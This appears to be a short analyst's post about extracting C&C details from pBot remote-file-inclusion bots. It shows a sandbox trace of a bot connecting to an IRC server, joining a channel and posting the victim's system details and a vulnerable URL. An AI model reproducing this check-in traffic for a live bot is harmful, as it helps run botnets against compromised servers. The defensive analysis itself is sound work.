I’m working on analyzing remote file inclusion (RFI) code. For pBot class which uses an IRF server as their command and control (C&C) , we are interested to get the IP addresses of the C&C, the channel name and the nickname used to connect to irc server. Below are sample of output:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
ok! <fsockopen>(host=irc.server_name.net, port=6667, , , 30)</fsockopen> <fwrite>( 1160 , “USER inul07429 127.0.0.1 localhost :Linux phpsBox 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 ” , )</fwrite> <fwrite>( 1160 , “NICK [E]inul92112 ” , )</fwrite> <fwrite>( 1160 , “MODE [E]inul92112 +ps” , )</fwrite> <fwrite>( 1160 , “JOIN #knk !anime” , )</fwrite> <fwrite>( 1160 , “PRIVMSG #trouxanime :[uname!]: Linux phpsBox 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 (safe: off)” , )</fwrite> <fwrite>( 1160 , “PRIVMSG #trouxanime :[vuln!]: http://” , )</fwrite> <fwrite>( 1160 , “NICK [E]inul97869” , )</fwrite> <fwrite>( 1160 , “PONG :1508829909” , )</fwrite> <fwrite>( 1160 , “PONG :1508829909” , )</fwrite> <fwrite>( 1160 , “PONG :1508829909” , )</fwrite> <fwrite>( 1160 , “PONG :1508829909” , )</fwrite> |